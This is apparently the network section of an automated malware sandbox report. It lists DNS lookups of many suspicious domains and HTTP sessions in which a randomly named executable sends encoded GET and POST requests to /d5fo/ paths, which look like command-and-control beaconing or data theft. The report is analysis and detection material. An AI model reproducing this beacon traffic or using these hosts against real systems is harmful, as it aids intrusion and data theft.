Jul 25, 2024 12:10:26.083298922 CEST	80	49753	91.195.240.19	192.168.2.5
Jul 25, 2024 12:10:26.084716082 CEST	80	49753	91.195.240.19	192.168.2.5
Jul 25, 2024 12:10:26.084850073 CEST	49753	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:10:26.911561966 CEST	49753	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:10:27.927340031 CEST	49754	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:10:28.241450071 CEST	80	49754	91.195.240.19	192.168.2.5
Jul 25, 2024 12:10:28.242655993 CEST	49754	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:10:28.242881060 CEST	49754	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:10:28.247736931 CEST	80	49754	91.195.240.19	192.168.2.5
Jul 25, 2024 12:10:28.886085033 CEST	80	49754	91.195.240.19	192.168.2.5
Jul 25, 2024 12:10:28.886352062 CEST	80	49754	91.195.240.19	192.168.2.5
Jul 25, 2024 12:10:28.886426926 CEST	49754	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:10:28.886461020 CEST	49754	80	192.168.2.5	91.195.240.19
Jul 25, 2024 12:10:28.891315937 CEST	80	49754	91.195.240.19	192.168.2.5
Jul 25, 2024 12:10:34.077157021 CEST	49755	80	192.168.2.5	104.21.25.75
Jul 25, 2024 12:10:34.083777905 CEST	80	49755	104.21.25.75	192.168.2.5
Jul 25, 2024 12:10:34.083925962 CEST	49755	80	192.168.2.5	104.21.25.75
Jul 25, 2024 12:10:34.084237099 CEST	49755	80	192.168.2.5	104.21.25.75
Jul 25, 2024 12:10:34.091842890 CEST	80	49755	104.21.25.75	192.168.2.5
Jul 25, 2024 12:10:35.062896967 CEST	80	49755	104.21.25.75	192.168.2.5
Jul 25, 2024 12:10:35.063438892 CEST	80	49755	104.21.25.75	192.168.2.5
Jul 25, 2024 12:10:35.063527107 CEST	49755	80	192.168.2.5	104.21.25.75
Jul 25, 2024 12:10:35.064784050 CEST	80	49755	104.21.25.75	192.168.2.5
Jul 25, 2024 12:10:35.064795971 CEST	80	49755	104.21.25.75	192.168.2.5
Jul 25, 2024 12:10:35.064851046 CEST	49755	80	192.168.2.5	104.21.25.75
Jul 25, 2024 12:10:35.301089048 CEST	80	49755	104.21.25.75	192.168.2.5
Jul 25, 2024 12:10:35.301526070 CEST	80	49755	104.21.25.75	192.168.2.5
Jul 25, 2024 12:10:35.301573038 CEST	49755	80	192.168.2.5	104.21.25.75
Jul 25, 2024 12:10:35.301668882 CEST	80	49755	104.21.25.75	192.168.2.5
Jul 25, 2024 12:10:35.301719904 CEST	49755	80	192.168.2.5	104.21.25.75
Jul 25, 2024 12:10:35.598944902 CEST	49755	80	192.168.2.5	104.21.25.75
Jul 25, 2024 12:10:36.614829063 CEST	49756	80	192.168.2.5	104.21.25.75
Jul 25, 2024 12:10:36.633507013 CEST	80	49756	104.21.25.75	192.168.2.5
Jul 25, 2024 12:10:36.636526108 CEST	49756	80	192.168.2.5	104.21.25.75
Jul 25, 2024 12:10:36.636990070 CEST	49756	80	192.168.2.5	104.21.25.75
Jul 25, 2024 12:10:36.642685890 CEST	80	49756	104.21.25.75	192.168.2.5
Jul 25, 2024 12:10:37.646517992 CEST	80	49756	104.21.25.75	192.168.2.5
Jul 25, 2024 12:10:37.646545887 CEST	80	49756	104.21.25.75	192.168.2.5
Jul 25, 2024 12:10:37.646564007 CEST	80	49756	104.21.25.75	192.168.2.5
Jul 25, 2024 12:10:37.646591902 CEST	49756	80	192.168.2.5	104.21.25.75
Jul 25, 2024 12:10:37.647630930 CEST	80	49756	104.21.25.75	192.168.2.5
Jul 25, 2024 12:10:37.647675991 CEST	49756	80	192.168.2.5	104.21.25.75
Jul 25, 2024 12:10:37.851721048 CEST	80	49756	104.21.25.75	192.168.2.5
Jul 25, 2024 12:10:37.852324963 CEST	80	49756	104.21.25.75	192.168.2.5
Jul 25, 2024 12:10:37.852442026 CEST	49756	80	192.168.2.5	104.21.25.75
Jul 25, 2024 12:10:37.853091955 CEST	80	49756	104.21.25.75	192.168.2.5
Jul 25, 2024 12:10:37.853174925 CEST	49756	80	192.168.2.5	104.21.25.75
Jul 25, 2024 12:10:38.552094936 CEST	49756	80	192.168.2.5	104.21.25.75
Jul 25, 2024 12:10:39.568200111 CEST	49757	80	192.168.2.5	104.21.25.75
Jul 25, 2024 12:10:39.573165894 CEST	80	49757	104.21.25.75	192.168.2.5
Jul 25, 2024 12:10:39.573364019 CEST	49757	80	192.168.2.5	104.21.25.75
Jul 25, 2024 12:10:39.573590994 CEST	49757	80	192.168.2.5	104.21.25.75
Jul 25, 2024 12:10:39.578334093 CEST	80	49757	104.21.25.75	192.168.2.5
Jul 25, 2024 12:10:39.578505039 CEST	80	49757	104.21.25.75	192.168.2.5
Jul 25, 2024 12:10:40.568747044 CEST	80	49757	104.21.25.75	192.168.2.5
Jul 25, 2024 12:10:40.569288969 CEST	80	49757	104.21.25.75	192.168.2.5
Jul 25, 2024 12:10:40.569300890 CEST	80	49757	104.21.25.75	192.168.2.5
Jul 25, 2024 12:10:40.569386005 CEST	49757	80	192.168.2.5	104.21.25.75
Jul 25, 2024 12:10:40.571445942 CEST	80	49757	104.21.25.75	192.168.2.5
Jul 25, 2024 12:10:40.571556091 CEST	49757	80	192.168.2.5	104.21.25.75
Jul 25, 2024 12:10:40.813386917 CEST	80	49757	104.21.25.75	192.168.2.5
Jul 25, 2024 12:10:40.813673019 CEST	80	49757	104.21.25.75	192.168.2.5
Jul 25, 2024 12:10:40.813730955 CEST	49757	80	192.168.2.5	104.21.25.75
Jul 25, 2024 12:10:40.814450026 CEST	80	49757	104.21.25.75	192.168.2.5
Jul 25, 2024 12:10:40.814506054 CEST	49757	80	192.168.2.5	104.21.25.75

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 12:07:03.295429945 CEST	59729	53	192.168.2.5	1.1.1.1
Jul 25, 2024 12:07:03.307652950 CEST	53	59729	1.1.1.1	192.168.2.5
Jul 25, 2024 12:07:08.319219112 CEST	59239	53	192.168.2.5	1.1.1.1
Jul 25, 2024 12:07:08.874983072 CEST	53	59239	1.1.1.1	192.168.2.5
Jul 25, 2024 12:07:24.568645954 CEST	52995	53	192.168.2.5	1.1.1.1
Jul 25, 2024 12:07:24.586939096 CEST	53	52995	1.1.1.1	192.168.2.5
Jul 25, 2024 12:07:38.010232925 CEST	60660	53	192.168.2.5	1.1.1.1
Jul 25, 2024 12:07:38.196417093 CEST	53	60660	1.1.1.1	192.168.2.5
Jul 25, 2024 12:07:51.500015974 CEST	58044	53	192.168.2.5	1.1.1.1
Jul 25, 2024 12:07:51.514928102 CEST	53	58044	1.1.1.1	192.168.2.5
Jul 25, 2024 12:07:59.569574118 CEST	57485	53	192.168.2.5	1.1.1.1
Jul 25, 2024 12:07:59.579312086 CEST	53	57485	1.1.1.1	192.168.2.5
Jul 25, 2024 12:08:07.634490013 CEST	55554	53	192.168.2.5	1.1.1.1
Jul 25, 2024 12:08:07.644476891 CEST	53	55554	1.1.1.1	192.168.2.5
Jul 25, 2024 12:08:15.712469101 CEST	49880	53	192.168.2.5	1.1.1.1
Jul 25, 2024 12:08:15.761501074 CEST	53	49880	1.1.1.1	192.168.2.5
Jul 25, 2024 12:08:29.021821022 CEST	59139	53	192.168.2.5	1.1.1.1
Jul 25, 2024 12:08:29.348115921 CEST	53	59139	1.1.1.1	192.168.2.5
Jul 25, 2024 12:08:42.695605040 CEST	57144	53	192.168.2.5	1.1.1.1
Jul 25, 2024 12:08:42.723297119 CEST	53	57144	1.1.1.1	192.168.2.5
Jul 25, 2024 12:09:16.693581104 CEST	59256	53	192.168.2.5	1.1.1.1
Jul 25, 2024 12:09:16.924238920 CEST	53	59256	1.1.1.1	192.168.2.5
Jul 25, 2024 12:09:30.336359978 CEST	59326	53	192.168.2.5	1.1.1.1
Jul 25, 2024 12:09:30.576173067 CEST	53	59326	1.1.1.1	192.168.2.5
Jul 25, 2024 12:09:45.928389072 CEST	50210	53	192.168.2.5	1.1.1.1
Jul 25, 2024 12:09:46.241648912 CEST	53	50210	1.1.1.1	192.168.2.5
Jul 25, 2024 12:10:00.021622896 CEST	49391	53	192.168.2.5	1.1.1.1
Jul 25, 2024 12:10:00.052165985 CEST	53	49391	1.1.1.1	192.168.2.5
Jul 25, 2024 12:10:20.240266085 CEST	63729	53	192.168.2.5	1.1.1.1
Jul 25, 2024 12:10:20.310129881 CEST	53	63729	1.1.1.1	192.168.2.5
Jul 25, 2024 12:10:33.898618937 CEST	52579	53	192.168.2.5	1.1.1.1
Jul 25, 2024 12:10:34.076256990 CEST	53	52579	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 25, 2024 12:07:03.295429945 CEST	192.168.2.5	1.1.1.1	0x1c59	Standard query (0)	www.2iqaoe.sbs	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:07:08.319219112 CEST	192.168.2.5	1.1.1.1	0x2bff	Standard query (0)	www.lookstudiov.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:07:24.568645954 CEST	192.168.2.5	1.1.1.1	0x51c9	Standard query (0)	www.pandafitnessboo.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:07:38.010232925 CEST	192.168.2.5	1.1.1.1	0xc82	Standard query (0)	www.biotecnology.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:07:51.500015974 CEST	192.168.2.5	1.1.1.1	0x22f6	Standard query (0)	www.eh28mf3cdv.xyz	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:07:59.569574118 CEST	192.168.2.5	1.1.1.1	0x778e	Standard query (0)	www.fourgrouw.cfd	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:08:07.634490013 CEST	192.168.2.5	1.1.1.1	0x3e1f	Standard query (0)	www.inform-you.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:08:15.712469101 CEST	192.168.2.5	1.1.1.1	0xed1f	Standard query (0)	www.bitmapsportsbook.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:08:29.021821022 CEST	192.168.2.5	1.1.1.1	0x3659	Standard query (0)	www.techstone.top	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:08:42.695605040 CEST	192.168.2.5	1.1.1.1	0x49f3	Standard query (0)	www.anuts.top	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:09:16.693581104 CEST	192.168.2.5	1.1.1.1	0xb559	Standard query (0)	www.bieniastest.xyz	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:09:30.336359978 CEST	192.168.2.5	1.1.1.1	0xe153	Standard query (0)	www.energysecrets.online	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:09:45.928389072 CEST	192.168.2.5	1.1.1.1	0x729d	Standard query (0)	www.www00003.icu	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:10:00.021622896 CEST	192.168.2.5	1.1.1.1	0x6c40	Standard query (0)	www.primerpaintjobs.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:10:20.240266085 CEST	192.168.2.5	1.1.1.1	0xbbf3	Standard query (0)	www.gacorslot188.com	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:10:33.898618937 CEST	192.168.2.5	1.1.1.1	0xd2d1	Standard query (0)	www.fwbkl.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 25, 2024 12:07:03.307652950 CEST	1.1.1.1	192.168.2.5	0x1c59	Name error (3)	www.2iqaoe.sbs	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:07:08.874983072 CEST	1.1.1.1	192.168.2.5	0x2bff	No error (0)	www.lookstudiov.com		74.208.236.162	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:07:24.586939096 CEST	1.1.1.1	192.168.2.5	0x51c9	No error (0)	www.pandafitnessboo.com		89.31.143.90	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:07:38.196417093 CEST	1.1.1.1	192.168.2.5	0xc82	No error (0)	www.biotecnology.org		217.76.156.252	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:07:51.514928102 CEST	1.1.1.1	192.168.2.5	0x22f6	Name error (3)	www.eh28mf3cdv.xyz	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:07:59.579312086 CEST	1.1.1.1	192.168.2.5	0x778e	Name error (3)	www.fourgrouw.cfd	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:08:07.644476891 CEST	1.1.1.1	192.168.2.5	0x3e1f	Name error (3)	www.inform-you.com	none	none	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:08:15.761501074 CEST	1.1.1.1	192.168.2.5	0xed1f	No error (0)	www.bitmapsportsbook.com	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 25, 2024 12:08:15.761501074 CEST	1.1.1.1	192.168.2.5	0xed1f	No error (0)	parkingpage.namecheap.com		91.195.240.19	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:08:29.348115921 CEST	1.1.1.1	192.168.2.5	0x3659	No error (0)	www.techstone.top		67.223.117.189	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:08:42.723297119 CEST	1.1.1.1	192.168.2.5	0x49f3	No error (0)	www.anuts.top		23.251.54.212	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:09:16.924238920 CEST	1.1.1.1	192.168.2.5	0xb559	No error (0)	www.bieniastest.xyz	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 25, 2024 12:09:16.924238920 CEST	1.1.1.1	192.168.2.5	0xb559	No error (0)	parkingpage.namecheap.com		91.195.240.19	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:09:30.576173067 CEST	1.1.1.1	192.168.2.5	0xe153	No error (0)	www.energysecrets.online		66.96.162.141	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:09:46.241648912 CEST	1.1.1.1	192.168.2.5	0x729d	No error (0)	www.www00003.icu		67.198.129.29	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:10:00.052165985 CEST	1.1.1.1	192.168.2.5	0x6c40	No error (0)	www.primerpaintjobs.com	primerpaintjobs.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 25, 2024 12:10:00.052165985 CEST	1.1.1.1	192.168.2.5	0x6c40	No error (0)	primerpaintjobs.com		3.33.130.190	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:10:00.052165985 CEST	1.1.1.1	192.168.2.5	0x6c40	No error (0)	primerpaintjobs.com		15.197.148.33	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:10:20.310129881 CEST	1.1.1.1	192.168.2.5	0xbbf3	No error (0)	www.gacorslot188.com	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 25, 2024 12:10:20.310129881 CEST	1.1.1.1	192.168.2.5	0xbbf3	No error (0)	parkingpage.namecheap.com		91.195.240.19	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:10:34.076256990 CEST	1.1.1.1	192.168.2.5	0xd2d1	No error (0)	www.fwbkl.com		104.21.25.75	A (IP address)	IN (0x0001)	false
Jul 25, 2024 12:10:34.076256990 CEST	1.1.1.1	192.168.2.5	0xd2d1	No error (0)	www.fwbkl.com		172.67.223.246	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.lookstudiov.com

www.pandafitnessboo.com

www.biotecnology.org

www.bitmapsportsbook.com

www.techstone.top

www.anuts.top

www.bieniastest.xyz

www.energysecrets.online

www.www00003.icu

www.primerpaintjobs.com

www.gacorslot188.com

www.fwbkl.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49712	74.208.236.162	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:07:08.888206959 CEST	481	OUT	GET /d5fo/?7b7D=GhGyKhGC7sKxzKp8eGdmcVyQLOHVXUrHMU0qcIbEymnWOlPdhkadwEXOFBFKC9rDKAL9A3qPLxSgX4nFFBMT0Qr3C3Mt9G1yNIIz6WxytSSBQEHhhuhnAxkZUHOGfulFQA==&jlx=Zd48SBF0d HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.lookstudiov.com Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
Jul 25, 2024 12:07:09.522630930 CEST	516	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Date: Thu, 25 Jul 2024 10:07:09 GMT Server: Apache X-Powered-By: PHP/8.2.21 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: http://lookstudiov.com/d5fo/?7b7D=GhGyKhGC7sKxzKp8eGdmcVyQLOHVXUrHMU0qcIbEymnWOlPdhkadwEXOFBFKC9rDKAL9A3qPLxSgX4nFFBMT0Qr3C3Mt9G1yNIIz6WxytSSBQEHhhuhnAxkZUHOGfulFQA==&jlx=Zd48SBF0d Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49713	89.31.143.90	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:07:24.593045950 CEST	753	OUT	POST /d5fo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.pandafitnessboo.com Origin: http://www.pandafitnessboo.com Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Referer: http://www.pandafitnessboo.com/d5fo/ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 37 62 37 44 3d 55 72 31 67 6a 59 35 6e 74 53 4f 6c 5a 6d 37 4d 55 4b 33 65 65 73 73 62 6c 6d 49 47 43 65 65 6c 5a 43 2b 44 73 52 42 41 30 68 76 36 4f 58 4f 37 4c 76 47 6d 49 41 72 30 6a 74 34 51 49 6c 71 66 50 42 68 45 39 32 33 42 74 4b 56 6c 77 4b 4d 33 75 52 43 50 4f 5a 57 41 37 47 6f 5a 30 53 54 73 4d 55 53 34 69 63 59 44 31 55 37 55 6e 74 48 39 38 63 38 71 79 66 74 6b 70 57 65 38 66 79 47 59 47 76 30 74 51 77 72 45 6b 78 71 53 37 65 6e 56 6e 55 68 55 61 33 4e 38 32 69 6a 7a 62 71 69 6d 59 7a 44 70 69 47 6b 51 42 55 52 4d 57 49 4d 45 36 6e 63 32 6e 32 45 42 45 31 63 48 46 55 77 51 76 70 4b 64 4b 36 59 3d Data Ascii: 7b7D=Ur1gjY5ntSOlZm7MUK3eessblmIGCeelZC+DsRBA0hv6OXO7LvGmIAr0jt4QIlqfPBhE923BtKVlwKM3uRCPOZWA7GoZ0STsMUS4icYD1U7UntH98c8qyftkpWe8fyGYGv0tQwrEkxqS7enVnUhUa3N82ijzbqimYzDpiGkQBURMWIME6nc2n2EBE1cHFUwQvpKdK6Y=
Jul 25, 2024 12:07:25.250333071 CEST	333	IN	HTTP/1.1 405 Not Allowed Date: Thu, 25 Jul 2024 10:07:25 GMT Content-Type: text/html Content-Length: 154 Connection: close Server: UD Webspace 3.2 Allow: GET, POST, HEAD Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49714	89.31.143.90	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:07:27.191171885 CEST	773	OUT	POST /d5fo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.pandafitnessboo.com Origin: http://www.pandafitnessboo.com Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 225 Referer: http://www.pandafitnessboo.com/d5fo/ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 37 62 37 44 3d 55 72 31 67 6a 59 35 6e 74 53 4f 6c 59 47 4c 4d 52 70 50 65 50 4d 73 61 67 6d 49 47 4e 2b 65 68 5a 43 79 44 73 51 31 51 30 54 62 36 4a 31 47 37 4b 75 47 6d 50 41 72 30 72 4e 34 66 47 46 71 55 50 42 6c 4d 39 30 7a 42 74 4b 42 6c 77 49 55 33 75 41 43 4d 50 4a 57 43 6e 47 6f 62 36 79 54 73 4d 55 53 34 69 63 64 4c 31 58 4c 55 6d 64 33 39 37 4e 38 74 37 2f 74 6e 75 57 65 38 62 79 48 52 47 76 30 66 51 78 33 69 6b 30 6d 53 37 62 44 56 6e 6c 68 54 54 33 4e 36 37 43 69 6e 51 61 48 51 52 79 6a 63 34 67 68 59 54 6c 64 4c 65 65 68 75 67 46 55 65 30 57 6f 35 55 6d 55 77 55 6b 52 35 31 4b 61 74 55 74 4f 75 77 61 42 41 65 6c 4d 73 4b 5a 7a 44 6b 46 7a 4b 52 38 70 5a Data Ascii: 7b7D=Ur1gjY5ntSOlYGLMRpPePMsagmIGN+ehZCyDsQ1Q0Tb6J1G7KuGmPAr0rN4fGFqUPBlM90zBtKBlwIU3uACMPJWCnGob6yTsMUS4icdL1XLUmd397N8t7/tnuWe8byHRGv0fQx3ik0mS7bDVnlhTT3N67CinQaHQRyjc4ghYTldLeehugFUe0Wo5UmUwUkR51KatUtOuwaBAelMsKZzDkFzKR8pZ
Jul 25, 2024 12:07:27.870083094 CEST	333	IN	HTTP/1.1 405 Not Allowed Date: Thu, 25 Jul 2024 10:07:27 GMT Content-Type: text/html Content-Length: 154 Connection: close Server: UD Webspace 3.2 Allow: GET, POST, HEAD Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49716	89.31.143.90	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:07:29.714313030 CEST	1790	OUT	POST /d5fo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.pandafitnessboo.com Origin: http://www.pandafitnessboo.com Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1241 Referer: http://www.pandafitnessboo.com/d5fo/ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 37 62 37 44 3d 55 72 31 67 6a 59 35 6e 74 53 4f 6c 59 47 4c 4d 52 70 50 65 50 4d 73 61 67 6d 49 47 4e 2b 65 68 5a 43 79 44 73 51 31 51 30 54 44 36 4f 47 65 37 4b 4e 2b 6d 4f 41 72 30 6c 74 34 50 47 46 71 7a 50 46 4a 49 39 30 76 52 74 49 35 6c 79 72 63 33 2f 43 36 4d 42 4a 57 43 2f 47 6f 61 30 53 54 31 4d 55 43 38 69 63 74 4c 31 58 4c 55 6d 65 76 39 6f 38 38 74 33 66 74 6b 70 57 65 34 66 79 48 35 47 76 74 71 51 79 62 55 6e 41 61 53 69 37 54 56 30 6e 4a 54 63 33 4e 34 38 43 69 76 51 61 37 44 52 79 2f 6d 34 67 39 79 54 69 52 4c 50 5a 59 79 39 48 6f 55 68 46 34 43 66 56 68 51 4b 67 39 31 71 62 2b 43 49 76 47 41 78 71 74 53 58 79 63 55 50 71 79 71 78 7a 33 33 59 70 55 76 70 66 55 64 50 34 48 50 65 46 48 6c 6e 38 76 39 36 7a 44 54 78 62 4d 45 33 77 66 69 71 35 37 56 4a 68 46 73 41 42 37 70 47 51 77 76 50 64 5a 34 4f 75 6d 49 4f 71 75 44 34 53 52 4b 54 74 2f 51 49 30 70 79 4c 4e 70 62 50 63 66 75 73 4d 36 6e 76 6b 34 51 2f 74 6d 49 76 6a 77 68 4c 38 6e 44 65 74 43 34 31 53 37 43 62 2f 31 7a 6e 44 6f 54 34 [TRUNCATED] Data Ascii: 7b7D=Ur1gjY5ntSOlYGLMRpPePMsagmIGN+ehZCyDsQ1Q0TD6OGe7KN+mOAr0lt4PGFqzPFJI90vRtI5lyrc3/C6MBJWC/Goa0ST1MUC8ictL1XLUmev9o88t3ftkpWe4fyH5GvtqQybUnAaSi7TV0nJTc3N48CivQa7DRy/m4g9yTiRLPZYy9HoUhF4CfVhQKg91qb+CIvGAxqtSXycUPqyqxz33YpUvpfUdP4HPeFHln8v96zDTxbME3wfiq57VJhFsAB7pGQwvPdZ4OumIOquD4SRKTt/QI0pyLNpbPcfusM6nvk4Q/tmIvjwhL8nDetC41S7Cb/1znDoT4PKy434UI4MJPIejM9V7b/h2zqwqKaG6cO7qSdzqW2ZvHA4PNJw7G4xaB6JD/+Mp456HvwrU8Q8sLTMwms2Wj04k6LwJvqf3r+Cb7ej7I9ZImvmHpWriXjngAvppK6t4YHxk8OaDQ7Y7F7febbAJWVCul/VNPND+FoKRuJg3w8rVNSjTuTOzhD5Um8j5fzCG7Lf5KFlX6qlOxrA+BLgzgs/xyyzxJztOc94mUZSarI2f1uHnkRLeA+ITs33fKwaE3gWGFdkPVFuJoEsLvIkQEng7leSHlY6eXZ7XyczYhBZtZcVDKBzrxGN3KOXUbpCjtvQxYUxuj/J5X2ntBDjTUJz6uD4RdIP0KFJQLJDpg2kWCfIRs0l9YWWyBYtRm/2pXznrgQjphbmHnJpc2k8Mq4AtwY+vvVgGuWWa9T0t0lW7q0fKT5bx58sXoV3Melv77P6/mOcnE80H/Fz+K9pbkvuBFHrmWEZyT1Kn0jsbCKHSjsgDcyhh9KAtfWkFsbce8LO4kmMyD9+MTrkZsDQ7kyMRfGnXk0wmULiblt/LFnVLQv3PwSl2ggs88ir5NtC0Q9m+FZ9AkhzSNkeh44pEc8zMYc9jk0HszCFyR+bnL9Q6M95LE23dSw+PYKbkOc2YfMzeq4kEcHfPYvEs9G/wVUrBVNkuLBirGPp [TRUNCATED]
